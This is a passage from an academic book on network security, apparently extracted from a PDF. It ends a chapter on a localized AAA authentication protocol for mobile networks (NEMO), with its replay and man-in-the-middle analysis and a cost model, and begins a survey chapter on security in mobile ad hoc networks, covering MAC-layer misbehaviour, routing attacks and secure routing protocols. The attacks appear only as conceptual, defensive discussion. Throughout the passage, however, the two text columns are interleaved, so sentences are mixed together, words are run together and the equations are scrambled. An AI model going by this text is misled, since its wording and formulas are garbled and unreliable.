where EK (⋅) is an encryption function using a K AAA are not exposed, any other entities except the
key of K. The AAAH server can verify the MR’s AAAL server and the MR cannot know SPLOCAL
identity by comparing with CR sent by the MR with and thus cannot construct KLOCAL. Similarly, SPHOME
the CR constructed by the AAAH server itself. If is encrypted using K AH and K AAA, and delivered to
two values are identical, the MR is successfully the HA and MR, respectively. Therefore, K HOME
authenticated. Otherwise, the authentication fails. derived from SPHOME is not revealed to other enti-
In our protocol, a malicious MR cannot create the ties except the HA and MR.
correct CR because it does not have K AAA. After
verifying the identity of the MR, the AAAH server replay Attack
transmits EK AAA ( SPLOCAL ) and EK AL ( SPLOCAL ) to
the AAAL server through a secure path. When the Replay attack involves the passive capture of data
AAAL server receives, it constructs K LOCAL using and its subsequent retransmission to produce an
EK AL ( SPLOCAL ) and forwards EK ( SPLOCAL ) to unauthorized effect. A malicious node keeps an
AAA
the MR. At last, the MR constructs K LOCAL using AReq message and then it can retransmit an old
EK AAA ( SPLOCAL ). After this procedure, the MR and AReq message to trick the AAAL server for false
the AAAL server share K LOCAL. authentication. In our protocol, LC is created ran-
For the intra-domain authentication, the AAAL domly and hence it always changes and therefore
serverintheforeignnetworkverifies thethe identity
malicious node cannot replay the old AReq
of the MR by comparing EK LOCAL ( LC ) constructed message. Even though the same LC is selected by
by the AAAL server with CR L sent by the MR. the attendant, RPI (i.e., timestamp) can prevent
On the other hand, to authenticate the foreign net- the replaying attack.
work, the MR uses an MC and CR M. The AAAL
server in the foreign network sends CR M that is Man-in-the-Middle Attack
created by
CRM = EK LOCAL ( MC ) A man-in-the-middle attack represents that an at-
(2) tacker is able to read, insert, and modify messages
0
Figure 7. Man-in–the-middle attack by a malicious MR
between two parties without either party knowing sIgnAlIng cost AnAlysIs
that the link between them has been compromised.
In NEMO environments, we can imagine an attack ReducingtheAAAtrafficisanimportant - require
that a malicious MR relays authentication messages ment in NEMO environments where a MONET
and it intends to use network resource illegally. moves with a high velocity and AAA procedures
Figure 7 illustrates the man-in–the-middle attack are frequently performed (e.g., train or car). There-
by a malicious MR for the inter-domain authentica- fore, through the analytical model, we quantify
tion. The malicious MR acts as an AR and relays the AAA cost (CAAA,) which is defined as the
authentication messages between the victim MR volume of AAA-related messages delivered over
and the AR. After the authentication procedures, the network and the unit of CAAA is bytes * hops
the malicious MR still can relay all of the (Lo, Lee, Chen, & Liu, 2004).
traffic
between the victim MR and AR. However, the Let i and j be the numbers of intra-domain hand-
malicious MR cannot use any network resource offs and inter-domain handoffs for each session,
because it has no knowledge of K LOCAL and K HOME. respectively. It is assumed that the subnet residence
Namely, if a fresh session key is established, the time of the MONET follows a general distribu-
malicious MR cannot further compromise the tion with mean 1/ S , which probability density
authentication procedure between the MR and function (PDF) is f S(t) and its Laplace transform
*
the AAAL server. is f S(s). In addition, the domain residence time of
the MONET follows a general distribution with
mean 1/ D, whose PDF is f D(t) and its Laplace
transform is f *D(s). When the inter-session arrival
time is assumed to be an exponential distribution
with rate I , the PDFs of i and j are respectively
given by (Lin, 1997)
0
 1 MR MR
1 − [1 − f S ( I )] i= 0 where Cintra and Cinter are the costs for intra-
*
 domain AAA and inter-domain AAA operations.

(i ) = 
S
On the other hand, the AAA cost of the MR au-
 1 [1 − f * ( )]2 [ f * ( )]i−1 i > 0
 S S I S I thentication without the localized AAA procedure
is given by
and MR
C AAA (i, j ) = i ⋅ Cnon
MR
−local (4)
 1
1 − [1 − f D* ( I )] j =0
 MR
where Cnon−local is the cost for an AAA op-
( j) =  D
 1 [1 − f * ( )]2 [ f * ( )] j −1 j > 0 eration without the localized AAA procedure.

 D D I D I Then, the average AAA cost of the MR can be
expressed as
MR
C AAA = ∑∑ C AAA
MR
(i, j ) ⋅ (i ) ⋅ ( j )
i j
where S = I / S and D = I / D . (5)
Since an inter-domain handoff implies that an For the VMN’s AAA cost, we consider the AAA
intra-domain handoff also occurs, i-j represents the cost incurred during the VMN is attached to the
number of pure intra-domain handoffs. Therefore, MONET. We assume that the VMN’s attachment
the AAA cost of the MR authentication in the time is drawn from an exponential distribution with
proposed AAA protocol when there are i intra- mean 1/ A. Let k be the number of inter-domain
domain handoffs and j inter-domain handoffs can handoffs during the attachment time. Then, the
be computed as PDF of k is given by
MR
C AAA (i, j ) = (i − j ) ⋅ Cintra
MR
+ j ⋅ Cinter
MR
(3)
Table 2. Parameters for numerical results
Wireless weight Number of ARs in a domain 9 I

MA D1 D2 D3
10 49 1 1 2, 5, 10 2, 5 2, 5
Table 3. Message length (bytes)
Attendant Solicit Attendant advertisement AReq ARep AMR
52 84 116 120 172
AHR AHA AMA AMLR AMLA
144 136 166 180 152
0
 1 tively, which are based on Calhoun et al. (2003)

 1 − [1 − f D ( A )] k =0
*
and Narten, Nordmark, and Simpson (1998). D1, D2,

(k ) =  A and D3 represent the distances between the AAAL
 1 [1 − f * ( )]2 [ f * ( )]k −1 k > 0
server and the AAAHMR server, between the MR
 A D A D A and its HA, and between the AAAHMR server and
MR
the AAAHVMN server, respectively. Then, Cintra ,
where A = A / D. Hence, the AAA cost of
MR
Cinter , and C MR can be calculated by multiplying
non −local
the VMN when there are k inter-domain handoffs the corresponding message length and the distance.
during the attachment time can be computed as For the transmission over a wireless link, a weight
value is used and it is set to 10 (Xie & Akyildiz,
AAA ( k ) = k ⋅ C AAA ,
C VMN V MN
(6) 2002). The number of subnets in a domain is 49.
I and A are normalized to 1.0
where C VM N
AAA is the cost for each VMN’s AAA whereas D equals S / Nbytheuid fl ow
fl model
operation. Consequently, the average AAA cost of (Zhang, Castellanos, & Campbell, 2002), where N
the VMN is expressed as is the number of subnets in a domain.
AAA = ∑ C AAA ( k ) ⋅ ( k )
As shown in Figure 8, the proposed AAA
C VMN V MN
(7) protocol has a smaller AAA cost than the non-
k
localized AAA protocol. Also, it can be seen that
MR
In this section, we evaluate the effects of mo- C AAA increases as µS increases (i.e., as the subnet
bility and the distance between a foreign network residence time of the MONET decreases). This is
and a home network on the AAA cost (i.e., CAAAMR because the number of inter- or intra-handoffs is
and CAAAVMN). The parameters and the size of each reduced when the mobility (i.e., µS) is low. Figure 8
AAA message are shown in Tables 2 and 3, respec- also indicates the AAA cost variation for different
Figure 8. The AAA cost of an MR
0
Figure9.TheAAAcostofaVMN
creases. As similar to Figure 9, the AAA cost of

D1 (i.e., D1=2Since
.) 0 1,5 MR MR
Cintra and Cinter are pro- the VMN in our protocol is not highly affected by
MR
portional to D1, C AAA increases with the increase of the distance values. Therefore, it is concluded that
D1significantly.Especially,theeffect 1
is more ofD out protocol is less sensitive the distance between
clear in the non-localized AAA protocol because the home network and the foreign network.
an AAA procedure is always performed at the
AAAH server in the non-localized AAA protocol.
Therefore, it can be concluded that our protocol is
conclusIon
more effective regardless of the distance between
the home network and the foreign network. Note
In this chapter, we have proposed a localized AAA
that this AAA cost considers only one MR. Hence,
protocol in NEMO environments. The proposed
as the network mobility services are proliferated,
AAA protocol is consistent with the NEMO basic
the reduction of the AAA cost by the proposed
support protocol where the mobility transparency is
AAAprotocolwillbemoresignificant.
supported. The proposed AAA protocol introduces
Figure 9 shows the AAA cost of the VMN,
a shared key between the MR and the AAA server
which exhibits a similar trend to Figure 8. It can
in the foreign network, so that the AAA procedure
be seen that the AAA cost when (D2, D3) is (5,2)
for the MR in intra-domain handoffs can be local-
is higher than the AAA cost of (2,5). This is due
ized. In addition, we proposed a exible fl billing
to IP-in-IP packet tunneling overhead between the
mechanism for VMNs moving across different
MR and its HA. Namely, as the distance between
domains. We analyzed the security concerns in
the MR and its HA D2 increases, more tunneling
the proposed AAA protocol in terms of mutual
overheads incur and then the AAA cost also in-
authentication, key exposure, replay attack, and
0
man-in-the-middle attack. Performance evaluation Keio University. (2002). InternetCar project.

results reveal that the localized AAA procedure Retrieved from http://www.sfc.wide.ad.jp/Inter-
can reduce the AAA traffic significantlynetCAR/ and the
localized AAA procedure is less sensitive to the
Le, F., Patil, B., Perkins, C., & Faccin, S. (2004).
distance between the home network and the for-
DiametermobileIPv6application. Internet Draft.
eign network. Consequently, it is expected that the
Retrieved from http://tools.ietf.org/html/draft-ietf-
proposed AAA protocol can be widely employed
aaa-diameter-mobileip-14
in NEMO environments.
Lin, Y. (1997). Reducing location update cost in
a PCS network. IEEE/ACM Transactions on Net-
rEfErEncEs working,5(2), 25-33.
Lo, S., Lee, G., Chen, W., & Liu, J. (2004). Ar-
Aboda, B., & Beadles, M. (1999). The network
chitectureformobilityandQoSsupportinall-IP
access identifier (RFC 2486). Retrieved from
wireless networks. IEEE Journal on Selected Area
http://tools.ietf.org/html/rfc2486
on Communications, 22(4), 691-705.
Calhoun, P., Loughney, J., Guttman, E., Zorn,
Narten, T., Nordmark, E., & Simpson, W. (1998).
NeighbordiscoveryforIPversion(IPv6 6 ) (RFC
(RFC 3588). Retrieved from http://www.rfc-editor.
2461). Retrieved from http://www.ietf.org/rfc/
org/rfc/rfc3588.txt
rfc2461.txt
Conta, A., & Deering, S. (1998). Internet control
Ott, J., & Kutscher, D. (2004, March). Drive-thru
messageprotocol(ICMPv6for ) theInternet - pro
Internet: IEEE 802.11b for automobile users. Paper
tocolversion(IPv6 6 ) (RFC 2463). Retrieved from
presented at the IEEE International Conference of
http://www.faqs.org/rfcs/rfc2463.html
the IEEE Communication Society, Hong Kong,
Devarapalli, V., Wakikawa, R., Petrescu, A., & China.
Thubert, P. (2005). Network mobility (NEMO)
Xie, J., & Akyildiz, I. (2002). A distributed dynamic
basic support protocol (RFC 3963). Retrieved
regional location management scheme for mobile
from http://www.ietf.org/rfc/rfc3963.txt
IP. IEEE Transactions on Mobile Computing, 1(3),
Ernst, T., & Lach, H. (2005). Network mobility 163-175.
support terminology (RFC 4885). Retrieved from
Zhang, X., Castellanos, J., & Campbell, A. (2002).
http: www.ietf.org/rfc/rfc4885.txt
P-MIP: Paging extensions for mobile IP. ACM Mo-
Information Society Technologies (IST). (2003). bile Networks and Applications, 7(2), 127-141.
Dynamic radio for IP-services in vehicular
environments. Retrieved from http://www.ist-
overdrive.org
kEy tErMs
Internet Engineering Task Force (IETF). (2006).
Network mobility working group. Retrieved from Accounting: Accounting is the action of
http://www.ietf.org/html.charters/nemo-charter. tracking the consumption of network resources
html by users.
Johnson, D., Perkins, C., & Arkko, J. (2003). Mo- Authentication: Authentication is the action of
bilitysupport(RFC inIPv63775). Retrieved from confirmingthatauserwhoisrequestingservices
http://www.ietf.org/rfc/rfc3775.txt is a valid user of the network services requested.
0
Authorization: Authorization is the action Replay Attack: Replay attack is an attack in

ofgrantingthespecifictypesofservice toaauser
which valid data transmission is maliciously or
depending on the authentication. fraudulently repeated or delayed.
Internet Engineering Task Force (IETF):
IETF is an organization to develop, promote, and End notE
standardize Internet-related protocols.
1
Man-in-the-middle Attack: Man-in-the- In the NEMO basic support protocol, all
middle attack is an attack in which an attacker is packets destined to MNNs are tunneled at
able to read, insert, and modify messages between the MR’s HA, so that the MR’s HA can keep
two communication parties. track of network usages of individual LFNs
and VMNs. Therefore, the MR’s HA can re-
Network Mobility: Network mobility is the port this information to the AAAH server.
mobility of an entire network that changes its point
of attachment to the Internet as a single unit.

Section III
Security in Ad Hoc and Sensor
Networks

Chapter XXVI
Security in Mobile Ad Hoc
Networks
Bin Lu
West Chester University, USA
AbstrAct
Mobileadhocnetwork(MANET)isaself-configuringandself-maintainingnetworkcharacteri
dynamic topology, absence of infrastructure, and limited resources. These characteristics introduce
security vulnerabilities, as well as difficulty in providing security services to MAN
tremendous research has been done to develop security approaches to MANETs. This work will discuss
the existing approaches that have intended to defend against various attacks at different layers. Open
challenges are also discussed in the chapter.
IntroductIon been brought to attention with the rapid research

progress in mobile telephony and personal digital
A mobile ad hoc network (MANET) is a self-con- assistants.
figuringandself-maintainingnetworkcomposed Early research in MANETs assumed a coopera-
of mobile nodes that communicate over wireless tive and trusted environment, which unfortunately
channels (Perkins, 2001). MANETs are charac- is not always true. In an unfriendly environment,
terized as infrastructure-less with rapid topology a variety of attacks can be launched, ranging
change, high node mobility, and stringent resource from passive eavesdropping to active interference.
constraints. A MANET is usually used in situations The attacks could target a number of devices or
such as military battles, disaster recovery, and services in MANETs, such as wireless channels,
emergent medical situations. While applications routing protocols, high-level applications, or even
in these areas still dominate the research needs for security mechanisms themselves. A misbehaving
MANETs, commercial applications (such as home node can be selfish or malicious, based on their
networking and personal area networks) have also intensions. A selfish node can simply deviate
from network protocols in order to maximize its vulnErAbIlItIEs, sEcurIty

ownprofit,whileamaliciousnodemayintend sErvIcEs,to And cHAllEngEs
corrupt some services or bring down some other
nodes.Bothselfishandmaliciousmisbehaviors are
MAnEts vulnerabilities
dangerous in that they could cause degradation in
the network performance, or even paralyzation of MANETs suffer from all the vulnerabilities that
the entire network. Therefore security has become their wired counterparts encountered. An adversary
a primary concern, especially for security-sensi- may launch various attacks ranging from passive
tive applications in a noncooperative or hostile eavesdropping to active interference such as traf-
environment. ficjamming,packetmodificationandfabrication,
However, introducing security features to message replay, denial-of-service (DoS), and so
MANETsisnotatrivialtask.Thelackofforth. afixed Some of these vulnerabilities are aggravated
infrastructure determines that MANETs do not in a wireless context due to the characteristics of
have a clear physical line of defense, unlike their MANETs, such as the lack of a clear line of defense
wired counterparts, who can deploy security and the in-the-air communications.
defense mechanisms e. ( g., firewalls) at network
Besides, ad hoc networks are susceptible to vul-
devices such as gateways or routers. The decen- nerabilities that are inherent to wireless networks,
tralized manner of operations also implies that whichresideintheirroutingandautoconfigurati
a central administration point is not realistic for mechanisms. The MAC (medium access control)
MANETs. Moreover, all security services come protocols (such as IEEE [1999] 802.11 series) and
with a price. The security mechanisms will share most of the routing protocols for MANETs are
with other services the precious communication and designed with the assumption that all the nodes
computation resources, which may consequently will cooperate and would not intentionally deviate
affect the performance of the node, or even the from the protocols. However, this is not always true,
entire network. Performance is also a basic concern especially in an autonomous network where nodes
for ad hoc networks, which means a tradeoff has belongtodifferentself-profitedorganizations.
to be made between security and other services Eavesdropping is generally easier in MANETs
such as computation and communication. There- than in the Internet due to the open nature of the
fore, minimum consumption of resources is one communication medium in MANETs. Passive
of the most important requirements for security attacksarebynaturedifficultto- detect,notme
solutions in MANETs. tioning in MANETs where many mobile devices
This chapter will discuss security issues in support promiscuous mode. Like in the wired
MANETs, including security attacks, security networks, cryptographic operations are used to
requirements, security solutions, and their advan- prevent ad hoc networks from eavesdropping.
tages and weakness. The MAC protocols in MANETs are vulnerable
The remainder of this chapter is organized totrafficjamming,whichiscausedbynodeswho
as follows: the following section will discuss the fail to follow the protocols in order to maximize
security vulnerabilities, security services, and theirownprofitorsimplytodisrupt - networkop
security challenges for MANETs; the third section erations. A node can obtain an unfair share of the
will focus on the security solutions that have been bandwidth by transmitting without waiting its turn,
proposed for MANETs. The security mechanisms or interrupt signal transmissions by injecting bogus
to protect MAC (medium access control) layer signals into the network. Communication channels
communications and routing protocols will be in MANETs are open and shared, therefore it is
described. Intrusion detections, authentication, difficulttopreventanddetectthiskindofatta
and key management will be also discussed in this Moreover, ad hoc nodes are usually battery-pow-
section. In the last section we will discuss the open ered, which makes energy a precious resource in
research issues for MANET security and then we MANETs. An adversary could launch a new type
will conclude the chapter.

of DoS attack, namely “sleep deprivation torture” • Authentication ensures that the identity of a
attack (Stajano & Anderson, 1999), by forcing a node in communication is indeed the entity
node to relay packets. it declares to be. Authentication can prevent
Ad hoc routing requires the participation of identity masquerade and unauthorized access
all the nodes in the network. MANETs are peer- to resource or information. Authentication
to-peer, namely all the nodes play the same roles is usually provided by digital signature or
as end hosts and routers as well. However, some possession of a secret (such as a key). Due
selfishnodesmayrefusetoforwarddatapackets to stringent resource constraint of MANETs,
or routing requests for other nodes to save energy the authentication protocols for the traditional
or communication resources. Some more dramatic Internet are not applicable because these
attacks by malicious nodes include dissemination protocols consume too much computational
of false routing information, sending frequent resources. Some authentication approaches
routing updates to achieve denial-of-service, and that use one-way hash function, which proves
deviatingtrafficfromlegalroute. to be faster than other cryptographic opera-
Like in the traditional wired networks, attacks tions, have drawn much attention because of
can target the security mechanisms as well. For theirefficiency.
examples, cryptographic operations can be at risk • Integrity ensures that a message in trans-
if a secret key is intercepted and compromised, or mission has not been maliciously altered or
a trusted authority is brought down. These attacks corrupted. A message can be corrupted due
are not intrinsic to wireless networks, but they to presence of malicious attacks, or com-
are difficult to prevent and detect in the context
munication failures, which may be common
of MANETs. on the lossy channels of ad hoc networks.
In addition to the traditional approaches
security services for the Internet, some researchers proposed
that a node could perform integrity check by
The services that should be provided in MA- overhearing the next hop when this next hop
NETs are the same as those in the wired networks, forwards the packet on along the path. This
which include availability, authentication, integ- overhearing technique can be easily used in
rity, confidentiality , and nonrepudiation. ad hoc networks because of the open nature
of the communication channels.
• Availability ensures that network services • Confidentiality guarantees that sensitive
are provided as supposed to be. In an ad hoc information is not disclosed to unauthorized
network without protection of proper security entities. Encryption used in wired networks
mechanisms, its service performance and is also used for MANETs.
availability can be easily compromised. For • Nonrepudiation ensures that the origin
example, signal jamming at the physical and of a message cannot deny having sent the
media access control layers can seriously message. Nonrepudiation allows a malicious
interfere with communications or even bring node who has sent false information to be
down the physical channels. A malicious or accused by legitimate users, and therefore
selfishnodecanalsodisruptroutingservices, is important in intrusion detection. Asym-
which may result in network partition. To metric key cryptography has been used to
solve the problem, some economic models provide nonrepudiation for both the Internet
have been proposed to stimulate cooperation and MANETs.
among nodes. Monitoring techniques are also
used to ensure proper provision of network Other security services for MANETs include
services. For instance, a node in promiscuous authorization and accounting. But to our best of
mode can monitor the communications in the knowledge, not much research work has been pub-
vicinity.

lished on authorization or accounting especially main concern for security solutions.

for MANETs. The security mechanisms or approaches should
be adapted to the characteristics of MANETs. Yang,
security challenges Luo, Ye, Lu, and Zhang (2004) propose that the
security solutions for MANETs should accommo-
Security is an important issue for mobile ad hoc date the following needs. First, the prevention and
detection mechanisms should be fully distributed
networks, especially for those in security-sensitive
environments. However, the unique characteristics through the network. They should collect security
of MANETs, such as absence of infrastructure, information from individual nodes to secure the
rapid and unpredictable change of topology, entire network. The security devices on each node
open and shared wireless medium, and stringent are able to work alone in local prevention and de-
resource constraints, have posed nontrivial chal- tection with limited computational resources and
lenges to security designs. battery power. Second, the security mechanism
First, use of open shared medium makes an ad on different layers of the protocol stack should all
hoc network susceptible to attacks such as eaves- cooperate and contribute to a line of defense. Also,
dropping, signal jamming, impersonation, message all the three components of intrusion prevention,
distortion, and message injection. A malicious nodedetection, and response, should be used to provide
is able to impersonate other nodes even without security. Finally, the security solutions should be
gaining physical access to the victims. able to adapt to the highly dynamic topology. It is
Second, absence of infrastructure and frequent difficulttoaccommodatetheseneeds.
change of topology and membership has tremen-
dously raised the probability of a network being
compromised. Unlike the traditional wired net- sEcurIty solutIons for
works, MANETs do not have dedicated routers to MAnEts
formaclearlineofdefensewheretrafficmonitoring
or access control mechanisms can be deployed. In Several security techniques or mechanisms have
addition, each mobile node functioning as a router been commonly used to provide security features
and participating in routing and packet forward- to MAC layer and ad hoc routing.
ing may lead to significant vulnerability since
Digital a
signature can protect integrity of data
malicious node en route can tamper the routing packets or nonmutable fields in routing packets
and data packets. In an ad hoc network, it is also However, public key cryptography is much slower
difficulttointroduceacentraladministrative - than symmetric keyen cryptography, especially on
tity to security solutions in that such an entity can devices with limited resources (such as CPU power
easily become a target of attacks, which may then and memory space), and has been considered
cause a failure of the entire network. unacceptable for MANETs by many researchers.
Third, due to constraints of resources (such as Moreover,itisvulnerabletoDoSattacksofooding fl
power, bandwidth, CPU capacity and memory), network with bogus packets for which signature
security mechanisms for MANETs must be verificationisrequired.Butpublic - keycryptogra
lightweight in terms of communication overhead, phy is still adopted in many security mechanisms
computation complexity, and storage overhead. because of its superiority in key distribution and
Asymmetric cryptography is usually considered its effectiveness in providing integrity and no-
too expensive for MANETs. Therefore symmetric repudiation services.
cryptographic algorithms and one-way functions Hash function is much faster than public key
are commonly used to protect data integrity and cryptography and therefore well suits the require-
confidentiality. ment of low overhead for MANETs. Hash chain is
Last, an ad hoc network may consist of a great usually used to protect authentication for mutable
number of nodes, which renders scalability another fieldsinneighboringcommunications.Hashchain

is built by applying a one-way hash function re- A malicious node can also transmit strong noise
peatedly. To create a one-way hash chain, a node signals to prevent messages in the victim vicinity
should choose a random value and then generate a from being received.
list of hash values, h0, h1, h2, ..., hn, from the random No matter a node is selfish or malicious, the
value, where hi+1 =H( hi)for0≤ i < n, where H is consequences of their misbehaviors can be severe
the hash function. To use a one-way hash chain and disastrous, and therefore should be addressed
for authentication, hn should be distributed first. problems with essential concerns. The
as security
Consecutive element, hi, can be authenticate by security solution is to detect misbehaviors and
applying H to previously distributed element, hj to locate the misbehaving nodes in a timely and
( j > i), for ( j - i) times. reliable manner. This is not a trivial task due to
Monitoring technique has been proved an the random nature of the MAC protocols and the
effective way to provide availability to routing shared and volatile medium. It is especially dif-
advertisement or data packet forwarding, and to ficult to differentiate between misbehavior a
promote fair share of bandwidth at MAC layer. an occasional deviation caused by impairment of
To monitor, nodes turn on promiscuous mode to wireless link.
listen to communication of neighboring nodes in Several approaches have been proposed to
order to ensure proper transmission of frames or handle selfish and malicious misbehaviors at th
packets. MAC layer1.
Reputation mechanisms have been used to- Oneapproachistoaddressselfishmisbehaviors
gether with cooperation mechanisms to enhance byusinggametheoretictechniquestofindastate
security in routing and MAC layer protocols. It where the misbehaving nodes cannot gain any
will be discussed in “Cooperation” topic in a later advantage over the well-behaved nodes (Cagalj,
section. Ganeriwal, Aad, & Hubaux, 2004; Konorski, 2001,
2002; Mackenzie & Wicker, 2000, 2003; Michiardi
wireless MAc security & Molva, 2002b). This approach has also been used
at network layer to secure routings.
MAC protocols for wireless networks such as IEEE Konorski (2001, 2002) proposes a game theo-
802.11 (1999) use a contention resolution mecha- retic model that targets selfishnodes who fail to
nism for sharing the open communication channel. adhere to MAC protocols by waiting for smaller
This resolution mechanism is fully distributed and backoff intervals than supposed to be. By apply-
requires cooperation among all the participating ing the noncooperative game model (Jones, 2000),
nodes. The participating nodes are expected to theapproachmodifiesthebackoffalgorithmusing
perform a random backoff before transmission to blackbursts and leads the game to a Nash equilib-
reduce contention and to ensure a reasonably fair rium point (Nash, 1950). The approach requires
share of the channel. accurate measurement of the duration, which is
However, in an untrusted network environment difficulttograntinMANETs.Cagaljetal.)024(
whereselfishormaliciousnodesmaybeincluded, developed a strategy that employs two Markov
cooperation cannot always be guaranteed. A self- chains (Jha, Tan, & Maxion, 2001) to derive from
ish node may intentionally deviate from MAC contention windows the access possibilities of the
protocols to maximize its throughput by obtain- misbehaving nodes and the well-behaved nodes,
ing an unfair share of the bandwidth. A malicious respectively. The approach can reach the Nash
node may intend denial-of-service (DoS) attacks equilibriumwithmultipleselfishnodes.
by injecting frames on the wireless medium con- Another approach, which has been mostly used,
tinuously, or intermittently with the intention of is to monitor the neighboring node by overhear-
conserving its own energy. The injection may cause ingandthenpenalizetheidentifiedmisbehaving
radio collisions and transmission jamming, and nodes (Gupta, Krishnamurthy, & Faloutsos, 2002;
thus repeated backoffs among legitimate nodes. Kyasanur & Vaidya, 2005; Radosavac, Baras, &

Koutsopoulos, 2005; Radosavac, Cardenas, Baras, ity of other compromised nodes, availability of
& Moustakides, 2006; Raya, Hubaux, & Aad, 2004; routing information, together with the fairness,
Xu, Trappe, Zhang, & Wood, 2005). determine the efficacy of the DoS attacks. Xu et
Raya et al. (2004) deals with MAC misbehaviors al. (2005) also provide interesting insights into
in wireless hot-spot communities, such as inten- jamming attacks at MAC layer. They proposed
tionally scramble frames or illegal manipulation four jamming attack models that can be used by
of backoff intervals also. A sequence of observa- an adversary who intend DoS attacks: constant,
tions is required to detect misbehaviors based on deceptive, random, and reactive jamming. The
the extent to which MAC protocol parameters are effectiveness of the four jammer strategies is
manipulated. evaluated by implementation of a prototype using
KyasanurandVaidyapropose )05 2 ( modifica - Berkeley Motes platform. Different measurements
tions to IEEE 802.11, such as letting the receiver for detecting jamming attacks are proposed. The
of the particular transmission decide whether the authors found that not a single measurement is
sender has deviated from the protocol. It is proposed sufficient to conclusively differentiate malici
to use additional nodes in the vicinity to detect col- attacks from link impairment.
lusions between the receiver and the sender. The To reliably detect misbehaviors at MAC layer,
authors also present a diagnosis scheme, which accurately and reliably monitoring the transmis-
uses a moving window and thresh to capture the sion pattern from a node is a critical factor and
misbehaving nodes. A scheme for punishing a still worth further investigation.
selfish node is also presented. Simulation results
show that the detection and penalty schemes are secure routing Protocols
effectiveinhandlingselfishMACmisbehaviors.
Radosavac et al. (2005) propose to let a node Routing protocols for MANETs are very different
compute the backoff values of its neighboring node from those existing Internet protocols, because
based on the RTS (request-to-send), CTS (clear-to- MANETs are self-organized and the protocols need
send), or ACK (acknowledgement) messages. The to cope with frequent topology change, open shared
problem is cast into a “minimax robust detection medium, and resource restrictions. In addition, all
framework,” in which the worst-case instance of the nodes also serve as routers, participating in route
attack will be identified and a detection discovery,rule of
route maintenance, and packet delivery.
optimum performance is generated with uncer- Thesecharacteristicshaveintroducedsignific
tain information. The approach requires clock difficultytoroutingsecurityinMANETs.
synchronization, which is considered not realistic In 1996, The Internet Engineering Task Force
by some researchers. A recently published work (IETF) established a MANET workgroup (Macker
by Radosavac et al. (2006) is an advanced version & Chakeres, 2006), which goal is “to standardize
of the published work of Radosavac et al. in 2005. of the IP routing protocol functionality suitable for
The work studies the single-node attacks as well wireless routing applications.” Since then, some
as colluding attacks. routing protocols have been proposed particularly
Gupta et al. (2002) and Xu et al. (2005) studied for MANETs.
the DoS attacks at MAC layer and analyzed dif- AODV (ad hoc on-demand vector) (Perkins,
ferent attack models with their traffic patterns.
Belding-Royer, & Das, 2003) is a reactive rout-
Gupta et al. (2002) demonstrate simulation of IEEE ing protocol. In AODV, the node who needs to
802.11 protocol as well as emulation of a perfectly establish a route to another node will broadcast a
fair MAC (FAIRMAC) protocol in order to show route request (RREQ) message to its neighbors.
how the employment of MAC layer fairness can Each node that receives the message establishes
prevent or alleviate the effect of the DoS attacks. areverselinktowardtheoriginatoroftheRREQ,
The authors also show that many other factors unless such a link has already existed. Dynamic
such as location of the malicious node, availabil-

source routing (DSR) (Johnson, Maltz, & Hu, 2004) licious nodes establish a link via private network
is a protocol that uses source routing technique, connectionandforwardallthereceivedtraffict
in which the sender constructs a “source route” in eachother.Inthistypeofattackthenormalow fl
the packet’s header that gives the hosts on the path. of routing packets will be short-circuited, and a
Destination-sequenced distance-vector (DSDV) virtual vertex cut of nodes can be created in the
(Perkins & Bhagwat, 1994) is a proactive routing network that the attackers control.
protocol which maintains a routing table that lists An adversary can also mount a replay attack by
all possible destinations in the network as well as sending an old advertisement in an attempt to get
metric and next hop to the destination. other nodes to update its routing table with stale
These protocols are designed without security routes. Sequence number is usually used to prevent
concern in mind, and therefore are susceptible to packets from being repeatedly passed on.
various attacks. Denial-of-service (DoS) attack can be attempted
by injecting packets into the network which may
Attacks on MANET Routing cause excessive consumption of resources. One
special type of DoS attacks, jellyfishattacks (Aad
Aselfishormaliciousnodecandisrupt - routing
Hubaux, &ser Knightly, 2004), is to hold packets
vices passively or actively. Their purposes include unnecessarily for some amount of time before for-
selfish conservation of own resource,warding disruption them.Thejellyfishattackcancausehigh
of routing, excessive resource consumption, and end-to-end delay and delay jitter. Rushing attacks
so forth. (Hu, Perrig, & Johnson, 2003b) takes advantage of
A selfish node may refuse to participate in the suppression mechanisms that are used by on-
routing by simply discarding routing packets. demand routing protocols to prevent duplicate rout-
This attack is usually not defended against secure ing requests from being spread. The suppression
routing protocols in that the node can still fail to mechanismprocessesonlythefirstrequestwhile
forward data packets even if a path including the skipping the duplicate ones. All these attacks are
selfishnodehasbeenestablished.Toprevent difficultthis todetectinMANETsduetotheinherent
attack, some cooperation mechanisms have been volatility of the communication channels.
proposed, which will be discussed later. Besides failing to follow routing protocols,
A malicious node can maliciously advertise which is sometimes referred as routing attacks,
falsified routing information by tampering fields
an attacker may also target the data messages
such as source, destination, metric, and so forth. traversing an established path. A misbehaving
Forexample,anattackercanclaimfalsified short
node may maliciously alter or drop data packets in
distance information by advertising zero or a very transit, which is called packet forwarding attacks.
small metric in order to attract and later drop the These two types of attacks are different due to
trafficoriginallydestinedto othernodes
blackhole (
the differences of routing and data packets. Usu-
attack), or in order to include itself on the path so ally, routing packets are altered as they circulate
that it can analyze the communications. Another around the network (such as in metric field that
example is that an attacker can use forged routing states the shortest distance to destination). Thus
packets to create a routing loop, causing packets routing packets are mutable, and called hop-by-hop
to circulate in the network without reaching their transmission. The data packets are nonmutable,
destinations. This malicious attack should be because the data are not changed during trans-
distinguished from nodes unknowingly providing missionexcept ( for some particular fields in the
incorrect or obsolete routing information, which header) and therefore is end-to-end transmission.
may result from topology change. This is not a The integrity of the data packets can be protected
trivial task due to the nature of ad hoc networks. by traditional cryptographic operations, while
Another type of attack, wormhole attack (Hu, routing packets are hard to protect.
Perrig, & Johnson, 2003a), happens when two ma-

Secure Routing Protocols route discovery. SAODV uses a digital signature to

authenticate in an end-to-end manner and to protect
Sanzgiri, Dahill, Levine, Shields, and Royer the integrity of the nonmutable fields in routi
(2002) propose the authenticated routing for ad messages (such as source, destination, sequence
hoc networks (ARAN), which is a secure protocol number, etc.). Hash chain is used to authenticate in
that provides authentication and nonrepudiation to a hop-by-hop manner the hop-count information,
route discovery and maintenance. ARAN requires whichistheonlymutablefieldinthemessages.A
thateachnodehaveacertificatesigned byatrusted
signature extension is added to the original AODV
certificateserver.Itintroducesmuch RREQ andRREPmessages
overhead by forauthenticationwith
requiring every node that forwards route request signature and hash chain.
tosignthecertificate,andthereforeis vulnerable
Hu et al. (2003) also designed a mechanism,
to DoS attacks. called packet leash, to defend against wormhole
Papadimitratos and Haas (2002) propose the attack. However, the mechanism requires clock
secure routing protocol (SRP), which can be ap- synchronization.Song,Qian,andLithere )05 2 ( -
